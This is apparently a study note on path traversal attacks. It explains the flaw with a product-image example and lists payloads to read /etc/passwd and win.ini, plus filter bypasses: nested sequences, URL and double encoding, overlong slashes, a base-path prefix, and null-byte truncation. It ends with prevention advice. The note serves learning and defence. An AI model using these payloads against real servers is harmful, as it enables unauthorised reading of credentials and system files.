Path Traversal attacks
Path Traversal notes
Category: [Server-Side]
Severity: [Medium to Critical]
Impact: [Information Disclosure, File Read/Write, RCE]
1. Concept
Path traversal also known as Directory Traversal, enables an attacker to read arbitrary files on the server that is running an application, example:
- Application code & data
- Back-end credentials
- Sensitive operating system files (e.g.
/etc/passwd) In some cases it can enable the attacker to write files and change application’s behavior and take full control over server.
2. Reading arbitrary files
example, a shopping website which is using ?filename=something to load images of products:
<img src="/loadimage?filename=1.png"
usually document root is /var/www/images, so site load /var/www/images/1.png, in this case attacker can change the path in URL with a path traversal sequence and read what he wants:
https://example.com/loadimage?filename=../../../etc/passwd
This causes website to read from the following path:
/var/www/images/../../../etc/passwd → /etc/passwd
This will show a UNIX sensitive file’s content to attacker. The scenario can happen on windows too:
https://example.com/loadimage?filename=..\..\..\windows\win.ini
3. Common obstacles to exploiting path traversal vulnerabilities
Many websites that place user inputs into file paths implements defenses against this attack which can be bypassed.
Some Bypasses:
filename=../../../etc/passwd → If this blocked
filename=/etc/passwd → Then refer directly to the file
If website removes path traversal sequence, for example ../, then:
../../../etc/passwd → Blocked
....//....//....//etc/passwd → (Site removes ../../..) → ../../../etc/passwd → Pass
In some contexts such as URL path or the filename parameter of a multipart/form-data request, web server may strip and remove any path traversal sequence, in this websites web server needs to URL-Decode the path, so URL-Encoding the sequence can be a good idea:
../../../etc/passwd → Blocked
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd → Pass
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd → Pass
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd → Pass
%252e%: %2e
%252f%: %2f
%c0%af: non-standard encoding of /
%ef%bc%8f: / → may also works
Application may require the user-supplied input to be started with the expected base folder or prefix, such as /var/www/images, in this case:
../../../etc/passwd → Blocked
/etc/passwd → Blocked
/var/www/images/../../../etc/passwd → Pass
Or sometimes it require user input to end with an expected format like .png:
../../../etc/passwd → Blocked
../../../etc/passwd%00.png → Pass
%00 (Null Byte) truncates the file name.
4. Preventing
- Avoid passing user inputs into the file name related fields.
- Compare user input with a whitelist of permitted values
- After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory.